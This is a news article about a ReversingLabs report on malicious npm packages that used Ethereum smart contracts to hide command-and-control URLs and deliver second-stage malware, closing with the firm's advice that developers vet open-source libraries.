Cybersecurity researchers have uncovered a new tactic where hackers are using Ethereum smart contracts to conceal and distribute malware, allowing them to bypass traditional security scans.
Lucija Valentić
In a report this week, security firm ReversingLabs detailed how malicious actors are embedding obfuscated scripts within Node Package Manager (npm) libraries — a popular platform for JavaScript tools — to fetch hidden command-and-control (C2) server URLs via the Ethereum blockchain. Once installed, these packages can deliver secondary malware payloads onto compromised systems.
Malware hidden in npm packages
ReversingLabs identified two malicious npm packages, colortoolsv2 and mimelib2, first published in July. While they appeared to function as simple downloaders, the packages instead queried Ethereum smart contracts to retrieve attacker-controlled URLs. Those URLs then connected to C2 servers that pushed second-stage payloads capable of stealing data, installing remote access tools, or serving as gateways for broader attacks.
The campaign is part of a growing trend where open-source ecosystems such as npm and GitHub are exploited through deceptive project setups and social engineering. Developers who unknowingly integrate these malicious dependencies into real applications inadvertently create supply chain risks for users downstream.
A broader evolution of threats
Supply chain attacks targeting developers have become increasingly sophisticated. Earlier this year, ReversingLabs flagged a trojanized npm package designed to scan systems for popular crypto wallets like Atomic and Exodus, silently redirecting funds to attacker addresses.
North Korea’s Lazarus Group has also been linked to npm-based attacks, while in 2024, security firm Slowmist reported a scam exploiting a malicious Ethereum RPC function to trick users of the imToken wallet.
What sets the latest campaign apart, ReversingLabs noted, is the use of Ethereum smart contracts not just for financial fraud, but as infrastructure to host URLs for malicious commands. This makes detection far more challenging, since the blockchain itself is being leveraged as a trusted intermediary.
Developer vigilance is key
ReversingLabs urged developers to remain vigilant when working with open-source libraries and third-party packages.
“It is critical for developers to assess each library,” the firm advised, emphasizing the need to scrutinize maintainers and project history rather than relying solely on download counts or commit activity.
